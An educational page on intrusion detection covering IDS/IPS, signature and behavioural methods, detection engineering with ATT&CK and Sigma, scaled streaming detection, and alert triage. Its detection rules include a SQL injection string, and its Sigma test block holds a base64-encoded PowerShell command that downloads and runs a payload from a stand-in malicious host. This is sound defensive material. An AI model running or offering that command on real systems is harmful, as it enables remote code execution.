Security logging gives you visibility; intrusion detection turns that visibility into action. While logs passively record what happens, intrusion detection actively analyzes events to identify attacks in progress—the difference between having security cameras and having guards watching those cameras.
Intrusion detection operates on a fundamental premise: attackers leave traces. Whether they're scanning for vulnerabilities, exploiting weaknesses, moving laterally through networks, or exfiltrating data, their activities generate patterns that differ from normal operations. The challenge is finding those patterns in the vast ocean of legitimate activity.
Modern intrusion detection has evolved far beyond simple pattern matching. Today's systems combine signature-based detection (matching known attack patterns), behavioral analysis (identifying deviations from baselines), machine learning (discovering novel threats), and threat intelligence (leveraging global knowledge). Understanding these techniques—and when to apply each—is essential for building detection capabilities that find real attackers while minimizing false positives.
By the end of this page, you will understand the fundamentals of intrusion detection, the differences between signature-based and behavior-based detection, how to architect detection systems at scale, and strategies for balancing detection sensitivity with operational noise. You'll learn to design detection capabilities that catch attackers without drowning security teams in false alarms.
An Intrusion Detection System (IDS) is a security technology that monitors systems or networks for malicious activity or policy violations. When suspicious activity is detected, an IDS generates alerts for security teams to investigate.
The Core Problem
Intrusion detection addresses a fundamental security challenge: how do you know when someone is attacking your systems? By the time damage is visible (data breach disclosed, ransomware deployed, systems offline), the attacker has often been present for weeks or months. The average dwell time—how long attackers remain undetected—is approximately 200 days in many industries.
IDS aims to dramatically reduce dwell time by identifying attack indicators early in the kill chain, ideally during reconnaissance or initial access rather than after objectives are achieved.
| Kill Chain Phase | Attacker Activity | Detection Opportunity |
|---|---|---|
| Reconnaissance | Port scanning, service enumeration, OSINT gathering | Network scan detection, unusual DNS queries, honeypot triggers |
| Initial Access | Phishing, vulnerability exploitation, credential stuffing | Failed auth spikes, exploit signatures, suspicious email patterns |
| Execution | Malware deployment, script execution, payload decoding | Process anomalies, script behavior, known malware signatures |
| Persistence | Backdoor installation, scheduled tasks, credential storage | Startup modifications, unexpected services, registry changes |
| Privilege Escalation | Exploiting local vulnerabilities, credential theft | Privilege changes, unusual sudo/admin access, LSASS access |
| Lateral Movement | Pass-the-hash, RDP, SMB exploitation | Unusual authentication patterns, network traffic anomalies |
| Exfiltration | Data collection, compression, external transfer | Large data transfers, unusual destinations, timing anomalies |
IDS vs. IPS: Detection vs. Prevention
It's important to distinguish between related but distinct concepts:
IDS (Intrusion Detection System): Monitors and alerts on suspicious activity. It's a passive observer that doesn't block traffic or modify behavior—it tells you something is happening.
IPS (Intrusion Prevention System): Actively blocks detected threats. It can drop packets, terminate connections, or quarantine systems. This adds protection but also risk—false positives can block legitimate activity.
The choice between IDS and IPS depends on confidence levels:
| Confidence | Action | Example |
|---|---|---|
| Very High | Block (IPS) | Known malware signature, banned IP |
| High | Alert (IDS) + Manual Response | Behavioral anomaly, possible attack |
| Medium | Alert (IDS) | Unusual but not clearly malicious |
| Low | Log for Analysis | Baseline deviation, requires context |
Many organizations use both: IPS for high-confidence threats (known ransomware signatures) and IDS for lower-confidence detections that require human judgment.
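The confidence-to-action table can be encoded directly as a routing policy. A minimal sketch (the thresholds and the `route_detection` name are illustrative assumptions, not from any particular product):

```python
from dataclasses import dataclass

@dataclass
class Detection:
    rule: str
    confidence: float  # 0.0-1.0, as scored by the detection engine

def route_detection(d: Detection) -> str:
    """Map detection confidence to an action tier, mirroring the table above."""
    if d.confidence >= 0.95:
        return "block"          # IPS: known malware signature, banned IP
    if d.confidence >= 0.80:
        return "alert+respond"  # IDS alert plus manual response
    if d.confidence >= 0.50:
        return "alert"          # IDS alert for analyst triage
    return "log"                # record for later analysis

print(route_detection(Detection("known_ransomware_sig", 0.99)))  # block
```

In practice the thresholds are tuned per rule family, not set globally.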
Every IDS faces a fundamental tradeoff. Increase sensitivity to catch more attacks, and you generate more false positives (alert fatigue). Decrease sensitivity to reduce noise, and you miss real attacks. The goal isn't zero false positives—it's an acceptable ratio that security teams can operationally handle while maintaining detection coverage.
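The math behind this tradeoff is unforgiving, because real attacks are rare relative to legitimate traffic (the base-rate problem). A back-of-envelope calculation with illustrative numbers:

```python
events_per_day = 10_000_000_000   # 10B events/day (medium enterprise)
fp_rate = 0.0001                  # 0.01% false positive rate
tp_rate = 0.9                     # detector catches 90% of attack events
attack_events = 1_000             # actual malicious events per day

false_alerts = (events_per_day - attack_events) * fp_rate
true_alerts = attack_events * tp_rate
precision = true_alerts / (true_alerts + false_alerts)

print(f"False alerts/day: {false_alerts:,.0f}")  # ~1,000,000
print(f"Precision: {precision:.4%}")             # under 0.1%
```

Even an excellent-sounding 0.01% false positive rate yields roughly a million false alerts per day, and fewer than one alert in a thousand is real. This is why pre-filtering and tiered detection (covered later) matter as much as rule quality.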
There are fundamentally two approaches to intrusion detection, each with distinct strengths and limitations. Effective detection strategies combine both.
Signature-Based Detection
Signature-based detection (also called misuse detection) works by matching observed activity against a database of known attack patterns—signatures. When activity matches a signature, an alert is generated.
How it works:
1. Capture raw events: network packets, log entries, process activity
2. Normalize events into a form the detection engine understands
3. Compare each event against the signature database
4. Generate an alert when activity matches a signature
Signature examples:
```
# Detect SQL injection attempt (Snort/Suricata-style; sid values illustrative)
alert tcp any any -> any 80 (content:"' OR '1'='1"; msg:"SQL Injection Attempt"; sid:1000001; rev:1;)

# Detect Nmap SYN scan
alert tcp any any -> any any (flags:S; detection_filter:track by_src, count 20, seconds 5; msg:"Possible Nmap SYN Scan"; sid:1000002; rev:1;)

# Detect known malware C2 domain
alert dns any any -> any any (dns.query; content:"evil-c2-domain.com"; msg:"Known Malware C2 Communication"; sid:1000003; rev:1;)
```
Behavior-Based Detection (Anomaly Detection)
Behavior-based detection takes a fundamentally different approach. Rather than matching known attack patterns, it establishes baselines of normal behavior and alerts when activity deviates significantly from those baselines.
How it works:
1. Collect activity over a training period (days to weeks)
2. Build statistical baselines per user, host, or service
3. Score new activity against the relevant baseline
4. Alert when deviation exceeds a defined threshold
Behavioral baselines might track:
- Login times, locations, and devices per user
- Typical data transfer volumes per host or service
- Processes normally executed on each system
- Network destinations each service communicates with
- API call rates and patterns per client
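For a concrete (if deliberately simplified) example of baselining: per-entity mean and standard deviation with a z-score threshold is the classic starting point. This sketch assumes a single numeric metric, such as daily outbound megabytes for one user:

```python
import statistics

def build_baseline(samples):
    """Baseline = mean and standard deviation observed during training."""
    return statistics.mean(samples), statistics.stdev(samples)

def is_anomalous(value, baseline, threshold=3.0):
    """Flag values more than `threshold` standard deviations from the mean."""
    mean, stdev = baseline
    if stdev == 0:
        return value != mean
    return abs(value - mean) / stdev > threshold

# Daily outbound megabytes for one user during a training period
training = [120, 95, 130, 110, 105, 125, 115, 100, 118, 122]
baseline = build_baseline(training)

print(is_anomalous(118, baseline))   # False: within the normal range
print(is_anomalous(5000, baseline))  # True: possible exfiltration
```

Production systems use richer models (seasonality, peer groups, multivariate features), but the core idea is the same: learn normal, score deviation.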
The most effective detection strategies layer both approaches. Use signature-based detection to catch known attacks with high confidence, and behavior-based detection to find novel threats. Correlate alerts from both to increase confidence: an anomaly that also matches a known pattern is more likely to be a real attack.
Intrusion detection systems are deployed at two primary vantage points: the network and the host. Each offers unique visibility into different aspects of potential attacks.
Network-Based IDS (NIDS)
NIDS monitors network traffic flowing across network segments, typically deployed at network choke points (egress, between zones) or using traffic mirroring.
What NIDS sees:
- Connection metadata: source/destination IPs, ports, protocols, volumes
- DNS queries and responses
- TLS handshake metadata (SNI, certificate details)
- Unencrypted payload content
- Traffic timing and flow patterns
NIDS Deployment Patterns:
Perimeter NIDS: Monitors ingress/egress traffic at network boundary. Catches external attacks, C2 communications, exfiltration.
Internal NIDS: Monitors east-west traffic between network zones. Critical for detecting lateral movement after initial compromise.
Cloud NIDS: Traffic mirroring in VPCs, monitoring flow logs. AWS VPC Traffic Mirroring, GCP Packet Mirroring.
NIDS Challenges in Modern Environments:
Encryption: TLS encrypts payload content, limiting deep packet inspection. Solutions include TLS termination at inspection points or relying on metadata analysis.
Volume: High-bandwidth networks can overwhelm NIDS. Solutions include sampling, specialized hardware (FPGA-based inspection), or cloud-native network analysis.
Ephemeral workloads: Containers and serverless create short-lived network endpoints. Solutions include service mesh integration and workload-aware monitoring.
Host-Based IDS (HIDS)
HIDS runs on individual hosts (servers, workstations) and monitors activity at the system level—everything the network can't see.
What HIDS sees:
- Process creation, command lines, and parent-child relationships
- File system changes (file integrity monitoring)
- Registry and configuration modifications
- Local authentication and privilege changes
- Loaded modules, drivers, and scheduled tasks
| Aspect | Network-Based (NIDS) | Host-Based (HIDS) |
|---|---|---|
| Deployment | Network infrastructure (TAPs, mirrors) | Agent on each host |
| Visibility | All network traffic on monitored segment | All activity on monitored host |
| Encryption impact | Limited view into encrypted payloads | Sees decrypted data on host |
| Coverage | All hosts on network segment | Only hosts with agents installed |
| Maintenance | Centralized, few devices | Distributed across all hosts |
| Performance impact | None on endpoints | Some CPU/memory on each host |
| Evasion | Encrypted channels, protocol abuse | Disabling agent, kernel rootkits |
| Best for | Network attacks, lateral movement, exfiltration | Malware, privilege escalation, insider threats |
Popular HIDS/EDR Solutions:
- OSSEC / Wazuh: open-source HIDS (log analysis, file integrity, rootkit detection)
- osquery: SQL-based endpoint visibility
- Commercial EDR platforms such as CrowdStrike Falcon, Microsoft Defender for Endpoint, and SentinelOne
Endpoint Detection and Response (EDR) extends HIDS with:
- Continuous recording of endpoint telemetry for retrospective investigation
- Centralized search and threat hunting across the fleet
- Automated response actions: isolate host, kill process, quarantine file
- Behavioral analytics beyond static rules
NIDS and HIDS aren't alternatives—they're complementary. NIDS catches attackers crossing network boundaries; HIDS catches what they do once inside a host. An attacker using encrypted C2 evades NIDS but is visible to HIDS when they execute commands. An attacker moving laterally via legitimate protocols (RDP, SMB) may evade HIDS detection rules but creates network patterns visible to NIDS.
Detection engineering is the discipline of systematically creating, testing, and maintaining detection rules. It treats detection as a software engineering problem—with version control, testing, deployment pipelines, and metrics.
The Detection Development Lifecycle:
1. Identify the threat: threat intelligence, incident learnings, ATT&CK gap analysis
2. Research the data: which log sources capture the behavior?
3. Write the rule in a versioned, reviewable format
4. Test against attack simulations and historical data
5. Deploy in shadow mode to measure false positive rates
6. Activate, then tune based on analyst feedback
7. Review periodically; retire rules that no longer earn their noise
MITRE ATT&CK as Detection Framework
The MITRE ATT&CK framework catalogs known adversary tactics and techniques. It provides:
- A shared vocabulary for describing adversary behavior
- Technique-level detail, including data sources useful for detection
- A structure for measuring and communicating detection coverage
Coverage mapping: Map your detections to ATT&CK techniques to identify gaps:
```
Tactic: Persistence
├── T1053: Scheduled Task/Job
│   ├── Detection: Windows Task Scheduler events (4698, 4699)
│   ├── Coverage: HIGH
│   └── Last validated: 2024-01-15
├── T1547: Boot/Logon Autostart Execution
│   ├── Detection: Registry key monitoring
│   ├── Coverage: MEDIUM (some keys missed)
│   └── Last validated: 2023-11-20
└── T1053.003: Cron (sub-technique of Scheduled Task/Job)
    ├── Detection: Not implemented
    ├── Coverage: NONE
    └── Priority: Add to backlog
```
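A coverage map like this is easy to keep as data and diff automatically against the techniques you care about. A minimal sketch (the technique IDs are real ATT&CK identifiers; the rule names and the mapping itself are hypothetical):

```python
# Techniques we want covered (from threat modeling / ATT&CK gap analysis)
required = {
    "T1053.005": "Scheduled Task",
    "T1547.001": "Registry Run Keys / Startup Folder",
    "T1053.003": "Cron",
    "T1136.001": "Create Local Account",
}

# What our deployed rules actually map to (illustrative rule names)
deployed_rules = {
    "win_schtask_created": ["T1053.005"],
    "registry_run_key_mod": ["T1547.001"],
}

covered = {t for techniques in deployed_rules.values() for t in techniques}
gaps = {tid: name for tid, name in required.items() if tid not in covered}

for tid, name in sorted(gaps.items()):
    print(f"GAP: {tid} ({name}) - no detection deployed")
```

Running this in CI against the rule repository turns coverage review from an annual spreadsheet exercise into a continuous check.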
```yaml
# Sigma Rule Format - Platform-agnostic detection rule
title: Suspicious PowerShell Encoded Command
id: d8c0b5e1-2d3f-4a5c-9b8e-1234567890ab
status: production
description: |
  Detects PowerShell execution with base64-encoded commands,
  commonly used by malware to obfuscate malicious scripts.
references:
  - https://attack.mitre.org/techniques/T1059/001/
  - https://attack.mitre.org/techniques/T1027/
author: Security Team
date: 2024/01/15
modified: 2024/01/20

tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1027

logsource:
  category: process_creation
  product: windows

detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - '-encodedcommand'
      - '-enc '
      - '-en '
      - '-ec '
  filter_legitimate:
    # Known legitimate uses of encoded commands
    ParentImage|endswith:
      - '\System32\svchost.exe'  # Windows Update
      - '\Microsoft\ConfigMgr\AdminConsole\bin\Microsoft.ConfigurationManagement.exe'
    User|contains: 'SYSTEM'
  condition: selection and not filter_legitimate

falsepositives:
  - SCCM/MECM deployment scripts
  - Some legitimate admin tools
  - Automated system management

level: high

# Testing metadata
testing:
  attack_simulation:
    command: "powershell.exe -encodedcommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA=="
    expected: alert
  benign_simulation:
    command: "powershell.exe -encodedcommand VwByAGkAdABlAC0ASABvAHMAdAAgACcASABlAGwAbABvACcA"
    expected: alert  # Still triggers, shows false positive rate
  last_validated: 2024-01-18
  true_positive_rate: 0.92
  false_positive_rate: 0.15
```

Detection Rule Testing
Detection rules must be tested before deployment—just like application code. Testing approaches:
Red Team Simulations: Execute actual attacks in controlled environments to validate detection
Atomic Red Team: Open-source library of attack simulations mapped to ATT&CK
```powershell
# Run specific technique simulation
Invoke-AtomicTest T1059.001 -TestNumbers 1
```
MITRE Caldera: Automated adversary emulation platform
Historical Replay: Replay known-malicious traffic/logs through detection rules
Production Shadowing: Run new rules in shadow mode (log matches but don't alert) to measure false positive rates before activation
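One way to operationalize shadow mode: record what the candidate rule would have alerted on, have analysts label a sample of those matches, and promote the rule only if its measured precision clears a bar. A sketch with illustrative thresholds:

```python
def shadow_mode_verdict(labeled_matches, min_precision=0.5, min_sample=50):
    """Decide a shadow rule's fate from analyst labels.

    labeled_matches: list of booleans, True = analyst confirmed real threat.
    Thresholds are policy choices, shown here as examples.
    """
    if len(labeled_matches) < min_sample:
        return "keep_shadowing"  # not enough data to judge yet
    precision = sum(labeled_matches) / len(labeled_matches)
    if precision >= min_precision:
        return "promote"
    return "tune_or_retire"

labels = [True] * 40 + [False] * 20   # 60 labeled shadow matches
print(shadow_mode_verdict(labels))    # promote (precision ~0.67)
```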
Like technical debt, detection debt accumulates when rules aren't maintained. Stale rules that no longer match modern attack variants, rules with excessive false positives that get ignored, and gaps in coverage for new techniques all represent detection debt. Regular review cycles (quarterly at minimum) should validate, tune, and retire detection rules.
Large-scale detection presents unique challenges. When you're processing billions of events daily across thousands of hosts and network segments, naive approaches that work in small environments fail spectacularly.
Scale Challenges:
Volume: A medium enterprise generates 10-100 billion events/day. Running complex detection rules against every event is computationally prohibitive.
Velocity: Events must be processed in near real-time for detections to be actionable. Detecting an attack 4 hours later isn't useful.
Variety: Events come in hundreds of formats from diverse sources. Normalizing everything for consistent analysis is challenging.
Alert Volume: Even a 0.01% false positive rate on 10 billion events is 1 million false alerts/day—completely unmanageable.
Tiered Detection Architecture
Effective scaled detection uses a tiered approach, with different detection layers for different event volumes and detection complexities:
Tier 1: Stream Processing (Real-time)
Simple, mostly stateless rules evaluated on every event as it arrives: signature matches, known-bad IPs and domains, critical-severity events. Millisecond-to-second latency.

Tier 2: Micro-Batch Processing (Near Real-time)
Windowed aggregations over minutes: brute-force counting, impossible travel, volume spikes. Seconds-to-minutes latency.

Tier 3: Batch Processing (Periodic)
Expensive analysis over hours or days of data: cross-source correlation, ML model scoring, baseline recomputation.

Tier 4: Threat Hunting (Manual)
Analyst-driven, hypothesis-based queries against the full data lake, looking for what the automated tiers missed.
```python
from pyspark.sql import SparkSession
from pyspark.sql.functions import *
from pyspark.sql.window import Window

# Real-time detection using Spark Structured Streaming
spark = SparkSession.builder.appName("SecurityDetection").getOrCreate()

# Read from Kafka stream
# (event_schema is an ECS-style StructType, assumed defined elsewhere)
events = (spark.readStream
    .format("kafka")
    .option("kafka.bootstrap.servers", "kafka:9092")
    .option("subscribe", "security-events")
    .load()
    .select(from_json(col("value").cast("string"), event_schema).alias("event"))
    .select("event.*"))

# Detection: Brute Force Login Attempts
# Alert when >10 failed logins from same IP in 5 minutes
login_failures = events.filter(
    (col("event.category") == "authentication") &
    (col("event.outcome") == "failure"))

brute_force = (login_failures
    .withWatermark("@timestamp", "10 minutes")
    .groupBy(
        window(col("@timestamp"), "5 minutes"),
        col("source.ip"))
    .agg(
        count("*").alias("failure_count"),
        collect_set("user.name").alias("targeted_users"))
    .filter(col("failure_count") > 10))

# Detection: Impossible Travel
# Alert when the same user authenticates from geographically distant
# locations in a short time period.
# NOTE: lag() window functions are not supported directly on streams;
# in production this logic runs as a micro-batch job or via stateful
# stream processing. Shown here in batch style for clarity.
auth_success = events.filter(
    (col("event.category") == "authentication") &
    (col("event.outcome") == "success"))

user_window = Window.partitionBy("user.id").orderBy("@timestamp")

impossible_travel = (auth_success
    .withColumn("prev_location", lag("source.geo").over(user_window))
    .withColumn("prev_time", lag("@timestamp").over(user_window))
    .withColumn("distance_km", calculate_distance(   # UDF, assumed defined
        col("source.geo"), col("prev_location")))
    .withColumn("time_diff_hours",
        (col("@timestamp").cast("long") - col("prev_time").cast("long")) / 3600)
    .withColumn("required_speed_kmh",
        col("distance_km") / col("time_diff_hours"))
    # Alert if required travel speed > 1000 km/h (impossible without flight)
    .filter(col("required_speed_kmh") > 1000))

# Write alerts to Kafka topic
# (serialize each stream to JSON before the union so the schemas align)
alerts = (brute_force.selectExpr("to_json(struct(*)) as value")
    .union(impossible_travel.selectExpr("to_json(struct(*)) as value")))

(alerts.writeStream
    .format("kafka")
    .option("kafka.bootstrap.servers", "kafka:9092")
    .option("topic", "security-alerts")
    .option("checkpointLocation", "/checkpoints/detection")
    .outputMode("update")
    .start())
```

Pre-filtering Strategies
Not every event needs full detection analysis. Implement pre-filtering to reduce load on detection engines:
Known-Good Filtering: Events from verified internal monitoring systems, health checks, expected automated processes can be filtered early (but still logged).
Severity-Based Routing: Route only high-severity source events through expensive detection rules.
Sampling for Baselines: For behavioral models, statistical sampling can establish baselines without processing every event.
Event Deduplication: Repeated identical events (from chatty systems) can be deduplicated with count aggregation.
```
Raw Events: 10 billion/day
    ↓ Known-good filter (remove monitoring, health checks)
Filtered: 4 billion/day
    ↓ Deduplication (collapse repeated events)
Deduplicated: 1 billion/day
    ↓ Severity routing (only high-severity for complex rules)
Complex Detection: 100 million/day
```
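The first two stages of such a funnel (known-good filtering and count-based deduplication) can be sketched in a few lines; the event field names and source names here are illustrative:

```python
from collections import Counter

KNOWN_GOOD_SOURCES = {"health-check", "synthetic-monitor"}

def prefilter(events):
    """Drop known-good sources, then collapse duplicates with a count."""
    kept = [e for e in events if e["source"] not in KNOWN_GOOD_SOURCES]
    counts = Counter((e["source"], e["type"], e["message"]) for e in kept)
    return [
        {"source": s, "type": t, "message": m, "count": c}
        for (s, t, m), c in counts.items()
    ]

events = (
    [{"source": "health-check", "type": "http", "message": "GET /ping"}] * 100
    + [{"source": "web-01", "type": "auth", "message": "login failed"}] * 50
)
deduped = prefilter(events)
print(deduped)  # one aggregated record: web-01 auth failures, count=50
```

Note that filtered events should still be logged for forensics; pre-filtering reduces what reaches the detection engine, not what gets retained.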
Detection is only valuable if alerts lead to action. Alert management transforms raw detections into investigations and responses.
The Alert Fatigue Crisis
Alert fatigue is the biggest operational challenge in security monitoring. Industry surveys consistently find that SOC teams receive far more alerts than they can investigate, and that a substantial share of alerts are ignored, closed without review, or simply tuned out.
The consequence: real attacks are missed because they're lost in the noise of false positives and low-priority alerts.
Alert Quality Metrics
Measure and optimize these metrics:
True Positive Rate (TPR): Of all actual attacks, what percentage did we detect?
TPR = True Positives / (True Positives + False Negatives)
Precision (Positive Predictive Value): Of all alerts, what percentage were real attacks?
Precision = True Positives / (True Positives + False Positives)
Mean Time to Detect (MTTD): How long between attack start and alert generation?
Mean Time to Investigate (MTTI): How long between alert and analyst beginning investigation?
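The rate metrics above reduce to simple confusion-count arithmetic; a minimal sketch:

```python
def detection_metrics(tp: int, fp: int, fn: int) -> tuple:
    """Return (TPR, precision) from confusion counts."""
    tpr = tp / (tp + fn) if (tp + fn) else 0.0        # recall / detection rate
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    return tpr, precision

# Example month: 45 attacks detected, 5 missed, 105 false alerts
tpr, precision = detection_metrics(tp=45, fp=105, fn=5)
print(f"TPR: {tpr:.0%}, Precision: {precision:.0%}")  # TPR: 90%, Precision: 30%
```

The catch in practice is the false-negative count: you only learn about missed attacks through incidents, red teams, or threat hunting, so measured TPR is always an estimate.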
Optimize for precision without sacrificing critical recall. Most organizations run 20-30% precision (70-80% false positive rate). World-class detection achieves 70%+ precision.
```typescript
interface SecurityAlert {
  id: string;
  timestamp: string;
  rule_name: string;
  severity: 'low' | 'medium' | 'high' | 'critical';
  source_ip?: string;
  user_id?: string;
  asset_id?: string;
  raw_event: Record<string, unknown>;
}

interface EnrichedAlert extends SecurityAlert {
  enrichment: {
    asset?: {
      name: string;
      criticality: 'low' | 'medium' | 'high' | 'critical';
      owner: string;
      network_zone: string;
    };
    user?: {
      name: string;
      department: string;
      risk_score: number;
      recent_activity_anomalies: number;
    };
    threat_intel?: {
      ip_reputation: 'clean' | 'suspicious' | 'malicious';
      known_iocs: string[];
      threat_actor?: string;
    };
    historical?: {
      similar_alerts_30d: number;
      false_positive_rate: number;
      avg_investigation_time_min: number;
    };
  };
  risk_score: number;
  auto_triage_recommendation: 'investigate' | 'likely_fp' | 'auto_close';
}

async function enrichAlert(alert: SecurityAlert): Promise<EnrichedAlert> {
  // Parallel enrichment from multiple sources
  const [asset, user, threatIntel, historical] = await Promise.all([
    alert.asset_id ? assetDatabase.lookup(alert.asset_id) : null,
    alert.user_id ? identityService.lookup(alert.user_id) : null,
    alert.source_ip ? threatIntelligence.checkIP(alert.source_ip) : null,
    alertHistoryService.getSimilarAlerts(alert.rule_name, 30),
  ]);

  // Calculate composite risk score
  const riskScore = calculateRiskScore({
    alertSeverity: alert.severity,
    assetCriticality: asset?.criticality,
    userRiskScore: user?.risk_score,
    threatIntelMatch: threatIntel?.ip_reputation === 'malicious',
    historicalFPRate: historical?.false_positive_rate,
  });

  // Auto-triage recommendation
  const recommendation = determineTriageAction({
    riskScore,
    fpRate: historical?.false_positive_rate || 0,
    threatIntel,
    userAnomalies: user?.recent_activity_anomalies || 0,
  });

  return {
    ...alert,
    enrichment: { asset, user, threat_intel: threatIntel, historical },
    risk_score: riskScore,
    auto_triage_recommendation: recommendation,
  };
}

function calculateRiskScore(factors: {
  alertSeverity: string;
  assetCriticality?: string;
  userRiskScore?: number;
  threatIntelMatch: boolean;
  historicalFPRate?: number;
}): number {
  let score = 0;

  // Base score from alert severity
  const severityScores = { low: 10, medium: 30, high: 60, critical: 90 };
  score += severityScores[factors.alertSeverity] || 20;

  // Asset criticality multiplier
  const criticalityMultipliers = { low: 0.5, medium: 1.0, high: 1.5, critical: 2.0 };
  score *= criticalityMultipliers[factors.assetCriticality] || 1.0;

  // User risk score contribution
  if (factors.userRiskScore) {
    score += factors.userRiskScore * 0.3;
  }

  // Threat intel boost
  if (factors.threatIntelMatch) {
    score *= 1.5;
  }

  // Historical false positive penalty
  if (factors.historicalFPRate && factors.historicalFPRate > 0.7) {
    score *= 0.5; // Heavily penalize high-FP rules
  }

  return Math.min(100, Math.max(0, score));
}
```

Deploying intrusion detection in a real environment requires careful planning and incremental rollout. Here's a practical implementation approach:
| Phase | Duration | Activities | Success Criteria |
|---|---|---|---|
| Discovery | 2-4 weeks | Inventory assets, map data sources, identify critical systems, understand attack surface | Complete asset inventory, data source catalog |
| Foundation | 4-8 weeks | Deploy log collection, establish SIEM/detection platform, implement baseline detections | All critical logs collected, basic detections active |
| Coverage Expansion | 8-12 weeks | Add detection rules mapped to ATT&CK, integrate threat intel, tune false positives | 80%+ ATT&CK coverage for critical techniques |
| Optimization | Ongoing | Reduce false positives, automate response, improve MTTD, threat hunting | Precision >50%, MTTD <1 hour for critical |
Starting Detection Rules
When building initial detection capability, prioritize these high-value, low-noise detections:
Authentication-Based:
- Spikes in failed logins per account or source IP (brute force, credential stuffing)
- Successful logins from dormant or disabled accounts
- Logins from unusual geographies or impossible travel

Administrative Actions:
- Creation of new admin accounts or privileged group membership changes
- Security tooling or audit logging being disabled
- Unexpected changes to firewall rules or IAM policies

Network-Based:
- Connections to known-malicious IPs or domains (threat intelligence feeds)
- Unusually large outbound data transfers
- Internal port scanning between network zones
Resist the temptation to deploy complex ML-based detection immediately. Start with simple, high-confidence signature rules for known-bad activity. Get operational excellence (analyst workflow, alert handling, tuning process) working well before adding complexity. A small number of well-tuned detections outperforms hundreds of noisy rules.
Intrusion detection transforms security logging from passive recording into active threat identification. By systematically analyzing events for attack indicators, you can find adversaries before they achieve their objectives.
What's Next:
Intrusion detection identifies known attack patterns and significant anomalies. But sophisticated attackers operate in ways that blend with normal activity. The next page covers Anomaly Detection—using statistical methods and machine learning to identify subtle deviations that signature-based detection misses.
You now understand intrusion detection fundamentals, methodologies, and implementation. This knowledge enables you to design detection systems that find attackers in your environment while maintaining operational sanity through effective alert management.